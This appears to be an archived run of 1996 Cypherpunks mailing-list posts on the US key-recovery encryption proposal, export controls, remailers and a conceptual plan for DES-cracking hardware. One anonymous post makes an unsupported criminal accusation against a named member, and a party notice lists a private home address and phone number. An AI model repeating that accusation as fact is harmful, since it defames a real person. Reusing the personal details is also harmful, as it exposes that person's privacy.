   Bidzos, chief executive of RSA Data Security, one of the 
   country's leading developers of data-scrambling software. 
   "We warned I.B.M. that the National Security Agency would 
   try to twist their technology." 
 
   The Clinton Administration also angered executives at the 
   software company Netscape Communications, who warned that 
   even the new Government plan would continue to hinder the 
   American industry's ability to compete internationally. 
 
   Peter Harter, Netscape's public-policy lawyer, contended 
   that the Administration was playing favorites among 
   computer companies, rewarding those willing to go along 
   with its approach by removing export restrictions that 
   might be retained for companies not willing to incorporate 
   the "key recovery" system in their products. 
 
   "This is tantamount to making public policy by extorting 
   high-tech companies," Mr. Harter said. 
 
   But some computer hardware makers were more conciliatory. 
 
   "From my perspective the process has been much better this 
   time," said Eric Schmitt, Sun Microsystem's chief 
   technology officer. "The question is still, 'How will 
   industry implement key recovery?' It's still too early to 
   say." 
 
   [End] 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Thu, 3 Oct 1996 10:46:29 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: How might new GAK be enforced?
In-Reply-To: <199610012106.RAA11318@redwood.skiles.gatech.edu>
Message-ID: <199610011603.MAA27024@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Richard Coleman writes:

: I've always wondered why large companies just don't write some type of
: standards document for crypto to interoperate, and then have each
: foreign branch write (or contract out) their own version.  I don't see how
: this violates export laws in any way.

The definition of ``software'' in the ITAR includes ``algortihms'' and
``logic flow'', so I suspect that the ODTC wouuld claim that the
standards are software that cannot be ``exported'' without a licnese.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu
                     URL:  http://samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dustbin Freedom Remailer <dustman@athensnet.com>
Date: Thu, 3 Oct 1996 03:37:50 +0800
To: cypherpunks@toad.com
Subject: Re: Signs of Trouble in D.C.
Message-ID: <199610021523.LAA12819@porky.athensnet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Oct 1996, Black Unicorn wrote:

> Any person congregating in a group of 2 or more persons on 
> public space within the boundaries of this drug free zone for 

Keep moving, proles.  The War on Some Drugs must continue.  Now excuse me
while I join my friends for a joint.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dustbin Freedom Remailer <dustman@athensnet.com>
Date: Thu, 3 Oct 1996 09:07:48 +0800
To: cypherpunks@toad.com
Subject: Re: Export laws don't just affect crypto
Message-ID: <199610021520.LAA12631@porky.athensnet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Oct 1996, Roger Williams wrote:

> Umm, so are you violating ITAR if you *use* these GPS-guided missiles
> outside the US? ;-)

Or how about if you launch a defective missile, GPS-guided, and the firing
circuitry just happens to be misprogrammed so that it won't detonate, and
the GPS module just happens to be very modular and easily recovered for
use in another project?

Maybe this missile could be carrying a crypto-CD, put there as a joke by
an unknown employee.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 3 Oct 1996 17:30:21 +0800
To: cypherpunks@toad.com
Subject: Ve know you have relatives in Germany
Message-ID: <199610030214.TAA19988@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Recollect all those World War II propoganda movies where 
the evil Nazi would sneer:
"Ve know you have relatives in ze Fatherland"

According Scientific American (page 40, october 1996, 
an early version of a proposed German web control law 
would require operators of "media services" to provide 
German authorities with the name of a german resident 
who would be "subject to unlimited criminal liabilities".

The Scientific American commentator predicted a low
rate of compliance.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Thu, 3 Oct 1996 02:10:17 +0800
To: cypherpunks@toad.com
Subject: Re: NYT on IBM GAK
Message-ID: <3.0b24.32.19961002070341.006970cc@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:14 AM 10/2/96 GMT, jya@pipeline.com (John Young) wrote:
>   The New York Times, October 2, 1996, pp. D1, D8. 
> 
> 
>   Compromise Is Offered on Computer Security Codes 
> 
>   By John Markoff 

[snip]
>   Executives of the International Business Machines 
>   Corporation said late yesterday that they were still lining 
>   up the final list of companies in the alliance. Those 
>   involved will include Digital Equipment and smaller 
>   data-security companies including RSA Data Security, Cylink 
                                      ^^^^^^^^^^^^^^^^^
>   and Trusted Information Systems. 
[snip]

>   "The Government announcement is disastrous," said Jim 
>   Bidzos, chief executive of RSA Data Security, one of the 
>   country's leading developers of data-scrambling software. 
>   "We warned I.B.M. that the National Security Agency would 
>   try to twist their technology." 
[snip]

Isn't there at least a slight contradiction here?  Hello, Mr. Markoff?  Is
RSA really involved in this "alliance" (read "sell out") or did IBM just
throw out their name?

Inquiring minds want to know...



Rich


______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
U.S. State Censorship Page at - http://www.teleport.com/~richieb/state
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 3 Oct 1996 02:21:23 +0800
To: attila <attila@primenet.com>
Subject: Re: LDS 'mountain'
In-Reply-To: <199610020752.BAA17192@infowest.com>
Message-ID: <32527A56.478D@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


attila wrote:
> Dale:
>         the 'mountain' contains only original copies of the church
>     records (actually quite small) and the immense collection of
>     the genealogy of the world as records are microfilmed whereever
>     the have been available.  these records contain ** only ** birth,
>     baptismal, marriage, death, and burial records.  most European
>     records come from the churchs.

[remaining text deleted]

The only reason I would bother to mention this is merely to caution 
people to think: What could *possibly* happen if the shoe were on the 
other foot.  If the Constitution is about anything at all, it's about 
balance of power, and when *any* power transfers more to one interest 
than another, interesting changes can occur.

BTW, there have been articles in the L.A. Times about attempts by 
persons not of the Mormon faith to prevent Mormons from dominating the 
cultural life in SLC schools, other public venues, etc.  This raises the 
eternal question: Can a group live the way *it* wants to without 
interference, or is group culture always going to constitute a threat to 
persons in the vicinity who don't share that culture?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Omegaman" <omega@bigeasy.com>
Date: Thu, 3 Oct 1996 00:32:48 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Clipper III on the table
Message-ID: <199610021251.HAA14601@bigeasy.bigeasy.com>
MIME-Version: 1.0
Content-Type: text/plain



> Allow me to say here that I do not belive that Netscape will be amongst 
> those fooled so easily. But IBM, HP, TIS, and others have already been 
> fooled. The USG does not need to get every software company to agree with 
> their proposal. Divide and conquer. Seems that the USG has done a 
> marvelous job of D&C so far.
> 


If anything, it would not be in their best _marketing_ interests to 
support GAK.  Rejecting GAK in favor of promoting strong crypto will 
make them look like "good guys".

This is also true of Micro$oft.  And contrary to an earlier opinion, 
I think Bill & Co. have been soured by their experiences with DoJ.  
While their are far larger motivations involve, I certainly don't 
think Micro$oft will skip at the chance to thumb their noses at the 
government if it's to their advantage.

Both of these companies may be willing to support a DES-crack effort

me 
--------------------------------------------------------------
 Omegaman <mailto:omega@bigeasy.com>
 PGP Key fingerprint =  6D 31 C3 00 77 8C D1 C2  
                        59 0A 01 E3 AF 81 94 63 
Send a message with the text "get key" in the 
"Subject:" field to get a copy of my public key.
--------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Thu, 3 Oct 1996 03:12:25 +0800
To: Frank Andrew Stevenson <frank@funcom.no>
Subject: Re: Can we kill single DES?
In-Reply-To: <199610020527.HAA24482@odin.funcom.com>
Message-ID: <Pine.3.89.9610020807.A3935-0100000@netcom22>
MIME-Version: 1.0
Content-Type: text/plain





On Wed, 2 Oct 1996, Frank Andrew Stevenson wrote:

> DES CRACKING SCREENSAVER
[...]
>the screensaver itself can simply display a rotating globe,
> where the different densities of global usage is given in colour shades, showing
> an inverse sunclock of sorts. I think such a concept might give the DES-cracking
> screensaver a critical mass.

That's a great idea. I belive it would be a powerful incentive.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Thu, 3 Oct 1996 03:31:52 +0800
To: John Young <jya@pipeline.com>
Subject: Re: NYT on IBM GAK
In-Reply-To: <199610021114.LAA20303@pipe3.ny2.usa.pipeline.com>
Message-ID: <Pine.3.89.9610020847.A3935-0100000@netcom22>
MIME-Version: 1.0
Content-Type: text/plain





On Wed, 2 Oct 1996, John Young wrote:

>    The New York Times, October 2, 1996, pp. D1, D8. 
>    Executives of the International Business Machines 
>    Corporation said late yesterday that they were still lining 
>    up the final list of companies in the alliance. Those 
>    involved will include Digital Equipment and smaller 
>    data-security companies including RSA Data Security, Cylink 
>    and Trusted Information Systems. 

We are in deep trouble.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John C. Randolph" <jcr@idiom.com>
Date: Thu, 3 Oct 1996 08:59:43 +0800
To: cypherpunks@toad.com
Subject: Utah as a Religious Police State
Message-ID: <199610021547.IAA25555@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



Moroni says:

>I never cease to be surprised by the interest that gentiles show
>in working mormon communities while totally neglecting their own
>failing areas.

I don't do a lot of nit-picking on this mailing list, but:

I am a Jew. *You* are a gentile. So are all the rest of the mormons.
Get this point straight.

-jcr







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Temple <dtemple@ashland.edu>
Date: Thu, 3 Oct 1996 00:52:46 +0800
To: cypherpunks@toad.com
Subject: Public Apology (this list is a joke)
Message-ID: <Pine.WNT.3.95.961002081942.241B-100000@test1>
MIME-Version: 1.0
Content-Type: text/plain


	I just wanted to apologize to the list for "whining like a 4 year
old".  I was upset that I was not "adult" enough to save the welcome
message I received when I joined the list.  I thought that if I acted like
a jerk someone would get upset and either kick me off the list or at least
give me instructions to do so myself.  I was right.  
	I joined this list knowing next to nothing about cryptography.  I
have learned quite a bit from those who have actually posted worthwhile
mail and would like to thank them.  I realize that a public list is very
hard to maintain, we have just begun offering listservs to our faculty
and we are already having problems.
	So thanks to  those of you who have sent me messages on how to
unsubscribe.  Once again, I am sorry for the whining.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 3 Oct 1996 14:21:55 +0800
To: cypherpunks@toad.com
Subject: Re: REM_ail
Message-ID: <199610021627.JAA25110@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:43 PM 10/2/96 GMT, John Young wrote:
>   10-8-96. VV: 
> 
>   "The Remailer Is Dead, Long Live the Remailer. Life After 
>   Penet."  By Dave Mandl (Excellent, Dave, yes!) 
> 
>   By the strict standards of the cypherpunks, a loosely 
>   knit affinity group of the Net's most radical and 
>   technoliterate privacy advocates, Penet's security was 
>   actually on the flimsy side. Its Achilles' heel was the 
>   file --  just begging to be subpoenaed -- that linked 
>   users' real names to their Penet pseudonyms. 
>   Cypherpunk-run remailers, on the other hand, generally 
>   leave no trace of the sender's true identity. In 
>   addition, cypherpunk remailers can be "chained" -- 
>   messages can be routed through several far-flung 
>   remailers before reaching their final destination, making 
>   message tracing all but impossible, even for the remailer 
>   operators. 
>   http://jya.com/remail.txt 
>   ftp://jya.com/pub/incoming/remail.txt 
  REM_ail

Now that Helsingius has shut down Penet, what's to stop him from simply 
LYING about the source of the messages in question, maybe claiming that they 
came from the output of a cypherpunks remailer and are thus permanently 
untraceable?

(one feature it might have been useful for him to have included in Penet is 
the ability of the user to re-address a return address, which would 
presumably erase the original address in the records.  Just sending email 
and some particular password would do it...)


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 3 Oct 1996 12:59:08 +0800
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: ITAR satellite provision
Message-ID: <199610021629.JAA25260@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:40 AM 10/2/96 -0700, Greg Broiles wrote:
>At 09:31 PM 10/1/96 -0700, Steve Schear wrote:
>
>>Does anyone on the list have the exact ITAR reg. text relating to the
>>exemption for space-launched crypto?
>
>I think you're talking about the definition of "export", located at 22 CFR
>120.10:
>
>     "Export means, for purposes of this subchapter:
[snip]
>*   A launch vehicle or payload shall not, by reason of the launching
>*   of such vehicle, be considered an export for purposes of this
>*   subchapter.  Most of the requirements of this subchapter relate
>    only to exports, as defined above.  However, for certain limited
>    purposes, the controls of this subchapter apply to sales and other
>    transfers of defense articles and defense services (see, e.g., Sec.
>    126.1) of this subchapter."


Okay, everybody, call Estes!  We've got some crypto to export...er...launch!



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 3 Oct 1996 15:20:17 +0800
To: cypherpunks@toad.com
Subject: Re: White House crypto proposal -- too little, too late
Message-ID: <Pine.GSO.3.95.961002092852.29327B-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Tue, 1 Oct 1996 20:19:16 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: fight-censorship@vorlon.mit.edu
Cc: joeshea@netcom.com
Subject: Re: White House crypto proposal -- too little, too late

[Joe, this may be yet another area where we disagree. It represents a
power grab by law enforcement; the infrastructure is prone to failure
and can be compromised; it's more government meddling and coercion and
more restrictions on free speech; the Fed bureaucrats controlling this
are vulnerable to special-interest lobbying; the Constitution gives
the Federal government no right to impose such restrictions; the FBI
has demonstrated that we can't trust the Feds with our most personal
information; it violates an absolute right to privacy; and it's
technically impractical for a good number of applications. --Declan]


---------- Forwarded message ----------
Date: Tue, 1 Oct 1996 15:57:51 -0700 (PDT)
From: Joe Shea <joeshea@netcom.com>
To: Declan McCullagh <declan@well.com>
Cc: fight-censorship
Subject: Re: FC: White House crypto proposal -- too little, too late


	Declan's most recent piece makes much more sense than the earlier
one.  He is quite correct in emphasizing the future vulnerability of the
encryption logarithms rather than centering on whether or not terrorists
might use them.  By making them impossible to crack without the key, and
permitting the key to be available to appropriate law enforcement
authorities when absolutely necessary, everyone's real needs are 
satisfied, I think.  I enjoyed this report a lot.

Best,

Joe Shea
Editor-in-Chief
The American Reporter
joeshea@netcom.com
http://www.newshare.com:9999








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: VaX#n8 <vax@linkdead.paranoia.com>
Date: Thu, 3 Oct 1996 02:31:56 +0800
To: cypherpunks@toad.com
Subject: encrypting pppd?
Message-ID: <199610021431.JAA02934@linkdead.paranoia.com>
MIME-Version: 1.0
Content-Type: text/plain


Anyone worked on, or know of a freely available, one of these beasts?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 3 Oct 1996 19:11:35 +0800
To: attila <cypherpunks@toad.com
Subject: Re: Can we kill single DES?
Message-ID: <199610021636.JAA25781@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:40 AM 10/2/96 +0000, attila wrote:

>
>        no, I certainly do not think hardware in particular is a bad 
>    idea.  
>
>-.I assume 
>-.that it would be generally straighforward to build a cracking chip that 
>-.tries 10 million keys per second, with a great deal of internal parallelism 
>-.and pipelining.  
>-.
>
>-.Now, THAT sounds like a real threat!
>
>        particulary if the design emphasizes unlimited linear extension!  
>
>-.An even more ominous configuration would involve perhaps 50 
>-.chips per full-length board, seven boards installed in a stripped-down  PC, 
>-.which would produce a crack in 4 months average with one system alone.
>-.
>        without a doubt, this is the best approach, but you will find
>    the chassis have a mix of ISA and PCI, or in some cases like I
>    specify, they will be EISA and PCI .   

It seems to me that very little communication over the ISA/PCI bus should be 
necessary.  If the Custom/FPGA/Whatever chips are reasonably self-managing, 
you'd just need to query them every second or so to see if they've found a 
solution yet.  (My WAG is that the chips would be initially set up to start 
checking at a particular key, with the decrypt done and the checking for 
equality with the target data done automatically.  If the data is the same 
as the target data, the processor would halt  (possibly setting some sort of 
daisy-chained interrupt?) and wait to be queried by the host processor.  
Otherwise it would increment the key, and try again at 10 million checks per 
second. The whole thing would probably be fully pipelined, for obvious 
reasons.)  

 Putting "N" such chips on a board should be quite doable, with an 
essentially unlimited expandability, possibly in large (10 by 10?  20 by 
20?) arrays, but then you couldn't install it directly as an ISA card.  
Admittedly this is all just trivial layout work, but as you pointed out it 
would be nice if the package was reasonably slick-looking.  Making a 
10-by-10-by-10(card) cube would be theatrical, if nothing else.  (as I 
understand it, immersing the whole thing in a vat of Freon to keep the chips 
cool and watching the thing bubble merrily away is great fun.)

Remember that part of this project may be to bring such a device to a 
Congressional hearing as a prop, and say that "this box can crack a DES 
encrypt in an average of 1.5 months" or something like that.


>        I know where there is a 20 slot PCI passive backplane in a 
>    rack mount for $350 and I think the vendor has P133 cards with 
>    either 128 or 512 M 72 pin slots.  512M is about 4,000 smackaroos
>    at this point.

I wouldn't imagine the power of the host computer would be at all relevant, 
however.  Right?  And DRAM requirements should be, well, fairly small.


>        PCI is much easier to interface than ISA and you have the bus
>    bandwidth to support the processor to co-processor transfer rates.

This confuses me.  Are you anticipating that the host processor would be 
doing a substantial amount of the work?

>        I'm not going to go through the mental masturbation of what DSPs
>    and FNGAs could manage in iterations/second until there is a firmer
>    design, but 350 chain/parallel or tiered chips sounds like it might
>    be more than 10% of the way to a terawhatever.


_IF_ the amount of handshaking needed from the host processor is extremely 
low, there is essentially no limit to how many such processors could be 
attached to even a low-power '386 or so. 


> 
>-.So how would all this be done?  First, write a serious proposal for the 
>-.project and circulate it among companies with fab capacity.
>
>        disagree, I would not even consider begging at the door of any
>    charitable fab until the design, and probably the layout, is in 
>    the can.  we might find it necessary to expand the trace depending
>    on the capabilities of the offered facilty, thereby by burning 
>    both more power, and reducing our yield per wafer.  
>
>        secondly, circulating a proposal among the hungry pack is
>    shopping around, which is almost always suicidal in raising money
>    and finding manufacturing partners.  they all know each other, and
>    you will end up with a "decision by commitee" and we know
>    committees are always formed to absolve the participants of blame
>    for failing to act, or whatever.

Well, I can't say I have any experience in the area of trying to stir up 
support for a project in this area, but I think it would at least be nice to 
know that there is a willing fab BEFORE the design is completed.  For one 
thing, fabs have small but significant differences in their capabilities.   
Two layers of poly and two of metal are probably more than enough to 
accomplish this, but taking advantage of greater capabilities wouldnt' be 
possible if the design had already been completed.  I'd sure hate to hear, 
"yeah, we can give you a two-layer-metal process, but your 3-layer metal 
design won't fit!"

BTW, I'm not rejecting the idea of using an FPGA.  Other people know a lot 
more about their current capabilities than I do, and if they know a modern 
FPGA will implement a DES crack, great.  The big advantage of an FPGA is 
that it is a relatively high-volume product and it shouldn't be hard to 
either get a donation of them or buy them for a reasonable price.  On the 
other hand, can they really implement all the internal logic required to 
crack DES?  A custom chip would make this trivial, I'd think.


>        on the other hand, I may personally have a rather strong 
>    distaste for selected reviewing, but it does give a taker some-
>    thing to crow about, that he was honoured to float this little 
>    package....  part of this is getting to the 'good-feeling' state
>    where the CEO thinks he will be a hero.

This may be another reason to shop around for the fab early.  Some people 
may be hard to convince, or perhaps they would be willing to help if they 
were given a certain number of months to plan.  

>
>-.Likewise, find a politically-sympathetic designer with access to IC 
>-.layout software, etc.
>
>        that, and determining what form or methodology will optimize
>    the design itself, are the two criticial first steps.  until that is 
>    resolved,  nothing should be done; and get a provisional layout
>    before finding the big sponser.  

I can see that figuring out the approximate size of the chip, as well as 
power consumption (defines the package, pin count, etc) is important.  


>-.The way I see it, there has to be a huge amount of 
>-.unused 0.5-0.7 micron IC capacity around the world.
>-.
>        yes, in older fabs. but the < 1u lines are loaded as of the
>    August summary.

Maybe they're all busy building DRAMs!  Associated with that  80% drop in 
DRAM prices between January of this year and today, is what I've vaguely 
heard is an approximate doubling in part volume.  

>-.Remember, we're only 
>-.talking about a few hundred wafers.
>-.
>        the real issue is a working prototype --if it's ready to go,
>    there should be no trouble persuading a fab to run a batch.
>    I think the Tylan and Therm etchers are loading about 100
>    six inch wafers and eight inch may be on line.  a six inch
>    wafer has 27 sqin total and depending on the size of the 
>    individual 
>
>-.Anyway, the way I see it, you're probably going to burn up over a million 
>-.dollars worth of ELECTRICITY alone on a single crack with Pentiums. 
>-.
>        4500 machines for $1M per year power?

Well, let's see.  Assume we're talking 150 watts of power per computer, at a 
price of about 10 cents per kwh.  That's 3.6 kwh per day, or 36 cents per 
day.  This works out to about $131 per computer-year, or $591,000 of 
electricity for 4500 machines.  Okay, I was a little off, but you get the 
point.

Obviously, things would help out a bit if the monitor were turned off, or 
the hard drives were shut down, etc,  or you were in an area with cheaper 
electricity.


>-.Maybe Microsoft would be willing to help?  After all, it is THEY who are 
>-.going to be limited to DES-strength exports if things continue as they've 
>-.been going.
>
>        you wish to hand over the project to Billy?  so all our good 
>    designers are shunted off into never-never land as Billy stands 
>    up in the spotlight and claims it was his brain, and the muscle he
>    created in MicroSlop, who proved his boot sector virus and pretty
>    programmer whupped the big bad government, who was trampling on
>    our rights?  
>
>            "I, and I mean 'I and my billions,' solved this trivial 
>            DES problem, and I, and I mean 'I,' am the champion of 
>            your god given rights as promised in the Bill of Rights."
>
>        count me out; Billy and Big Ears are a perfect pair, they think
>    they walk on the same water!  

Well, okay, but let's not burn our bridges too quick.
 

>-.How about Intel?
>
>        well, at least Andy Grove would not pull a Bill Gates. however,
>    Grove and company are very bottom line oriented and turn around
>    has been proven to be pretty slow in most of their fab plants --but
>    they have a special section of engineering knock-up.   I believe 
>    both Silicon Gulch and Hillsboro have 'em. 


I suppose one possible problem with Intel is that most of their fabs are 
likely to be dedicated to extremely high-value parts, as opposed to 
garden-variety MOS.  



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Shea <joeshea@netcom.com>
Date: Thu, 3 Oct 1996 13:20:13 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: White House crypto proposal -- too little, too late
In-Reply-To: <Pine.GSO.3.95.961002092852.29327B-100000@well.com>
Message-ID: <Pine.3.89.9610020942.A12604-0100000@netcom17>
MIME-Version: 1.0
Content-Type: text/plain




	Declan, how does your list work?  Do you only publish comments 
that agree with you?  I didn't see my first two, and this one only came 
with your response.  Is this your version of freedom of the press, or what?

Joe Shea
Editor-in-Chief
The American Reporter
joeshea@netcom.com
http://www.newshare.com:9999


On Wed, 2 Oct 1996, Declan McCullagh wrote:

> 
> 
> ---------- Forwarded message ----------
> Date: Tue, 1 Oct 1996 20:19:16 -0700 (PDT)
> From: Declan McCullagh <declan@well.com>
> To: fight-censorship@vorlon.mit.edu
> Cc: joeshea@netcom.com
> Subject: Re: White House crypto proposal -- too little, too late
> 
> [Joe, this may be yet another area where we disagree. It represents a
> power grab by law enforcement; the infrastructure is prone to failure
> and can be compromised; it's more government meddling and coercion and
> more restrictions on free speech; the Fed bureaucrats controlling this
> are vulnerable to special-interest lobbying; the Constitution gives
> the Federal government no right to impose such restrictions; the FBI
> has demonstrated that we can't trust the Feds with our most personal
> information; it violates an absolute right to privacy; and it's
> technically impractical for a good number of applications. --Declan]
> 
> 
> ---------- Forwarded message ----------
> Date: Tue, 1 Oct 1996 15:57:51 -0700 (PDT)
> From: Joe Shea <joeshea@netcom.com>
> To: Declan McCullagh <declan@well.com>
> Cc: fight-censorship
> Subject: Re: FC: White House crypto proposal -- too little, too late
> 
> 
> 	Declan's most recent piece makes much more sense than the earlier
> one.  He is quite correct in emphasizing the future vulnerability of the
> encryption logarithms rather than centering on whether or not terrorists
> might use them.  By making them impossible to crack without the key, and
> permitting the key to be available to appropriate law enforcement
> authorities when absolutely necessary, everyone's real needs are 
> satisfied, I think.  I enjoyed this report a lot.
> 
> Best,
> 
> Joe Shea
> Editor-in-Chief
> The American Reporter
> joeshea@netcom.com
> http://www.newshare.com:9999
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dustbin Freedom Remailer <dustman@athensnet.com>
Date: Thu, 3 Oct 1996 08:39:35 +0800
To: cypherpunks@toad.com
Subject: [IMPORTANT] GAK
Message-ID: <199610021518.LAA12535@porky.athensnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy May is a convicted child molester.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 3 Oct 1996 14:11:20 +0800
To: Joe Shea <joeshea@netcom.com>
Subject: Re: White House crypto proposal -- too little, too late
In-Reply-To: <Pine.3.89.9610020942.A12604-0100000@netcom17>
Message-ID: <Pine.GSO.3.95.961002095501.29327C-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


Joe, you submitted three pieces in roughly so many days to
fight-censorship-announce, with is a moderated announcement-only
mailing list that I send one or two pieces to each day. With some rare
exceptions (like feedback I got on my anti-Net-univ-service rant) I
don't pass along comments.

If you want to distribute them to the discussion list, address them to
fight-censorship@vorlon.mit.edu instead. Perhaps you should join that
list. It gets about 15 messages a day.

But don't blame me for your own cluelessness. RTFM instead of whining.

-Declan

PS: Freedom of speech includes the right not to speak. If I choose not
to publish your stuff, my right to do so is protected under the First
Amendment. Don't like it? Start your own
Joe-Shea's-wacko-views-on-First-Amendment-jurisprudence mailing list
instead. I'll even help you set it up.


On Wed, 2 Oct 1996, Joe Shea wrote:

> Date: Wed, 2 Oct 1996 09:47:59 -0700 (PDT)
> From: Joe Shea <joeshea@netcom.com>
> To: Declan McCullagh <declan@well.com>
> Cc: cypherpunks@toad.com
> Subject: Re: White House crypto proposal -- too little, too late
> 
> 
> 
> 	Declan, how does your list work?  Do you only publish comments 
> that agree with you?  I didn't see my first two, and this one only came 
> with your response.  Is this your version of freedom of the press, or what?
> 
> Joe Shea
> Editor-in-Chief
> The American Reporter
> joeshea@netcom.com
> http://www.newshare.com:9999
> 
> 
> On Wed, 2 Oct 1996, Declan McCullagh wrote:
> 
> > 
> > 
> > ---------- Forwarded message ----------
> > Date: Tue, 1 Oct 1996 20:19:16 -0700 (PDT)
> > From: Declan McCullagh <declan@well.com>
> > To: fight-censorship@vorlon.mit.edu
> > Cc: joeshea@netcom.com
> > Subject: Re: White House crypto proposal -- too little, too late
> > 
> > [Joe, this may be yet another area where we disagree. It represents a
> > power grab by law enforcement; the infrastructure is prone to failure
> > and can be compromised; it's more government meddling and coercion and
> > more restrictions on free speech; the Fed bureaucrats controlling this
> > are vulnerable to special-interest lobbying; the Constitution gives
> > the Federal government no right to impose such restrictions; the FBI
> > has demonstrated that we can't trust the Feds with our most personal
> > information; it violates an absolute right to privacy; and it's
> > technically impractical for a good number of applications. --Declan]
> > 
> > 
> > ---------- Forwarded message ----------
> > Date: Tue, 1 Oct 1996 15:57:51 -0700 (PDT)
> > From: Joe Shea <joeshea@netcom.com>
> > To: Declan McCullagh <declan@well.com>
> > Cc: fight-censorship
> > Subject: Re: FC: White House crypto proposal -- too little, too late
> > 
> > 
> > 	Declan's most recent piece makes much more sense than the earlier
> > one.  He is quite correct in emphasizing the future vulnerability of the
> > encryption logarithms rather than centering on whether or not terrorists
> > might use them.  By making them impossible to crack without the key, and
> > permitting the key to be available to appropriate law enforcement
> > authorities when absolutely necessary, everyone's real needs are 
> > satisfied, I think.  I enjoyed this report a lot.
> > 
> > Best,
> > 
> > Joe Shea
> > Editor-in-Chief
> > The American Reporter
> > joeshea@netcom.com
> > http://www.newshare.com:9999
> > 
> > 
> > 
> > 
> > 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 3 Oct 1996 18:40:07 +0800
To: cypherpunks@toad.com
Subject: Party in Santa Cruz, CA, October 12th, 5 p.m.
Message-ID: <v03007801ae785c2e7587@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



Here's an announcement for a party at my house on Saturday, October 12th,
1996. Cypherpunks and others are welcome to attend, especially those in the
Santa Cruz--Monterey area, or even those from the Bay Area and Beyond who
want to make the drive. The party is nominally a party for folks in another
group I'm in (PenSFA--the Peninsula Science Fiction Association), but many
of the Usual Suspects (Bay Area folks) will be there, including various
Cypherpunks. Still, this is not a "Cypherpunks meeting" per se. (The
October 12th date for the PenSFA schedule happens to collide with the usual
"second Saturday" date for a Bay Area Cypherpunks gathering, but my party
should not be confused with this general meeting. If there is such a
meeting on the 12th, you can come on down afterwards!)

(Apologies for posting this to the list, but it's the best way to get the
information out. To make up for the bandwidth, I'll try to avoid posting
any other articles today.)

Last minute note: At previous parties, many have arrived "fashionably
late." Unfortunately, my house is in a rural area, with no streetlights and
few signs, and several people reported problems finding the place in total
darkness. So, you have been warned....it's easier to find your way before
it gets dark. Also, standard PenSFA rules are for people to bring some food
or drink to share, or contribute $2 to a general fund. I'll have a barbecue
grill set up, so items for the grill are a good idea.

-----

PenSFA & Others Party, Tim May's house, Corralitos (10 miles east of Santa
Cruz). Saturday, October 12th. Party starts at 5 p.m. Standard party
rules--bring something to eat and drink, and preferably to share. A couple
of barbecue grills will be available. 427 Allan Lane, Corralitos,
408-728-0152. Two cats.

People are welcome to stay over until Sunday. I suggest you contact me
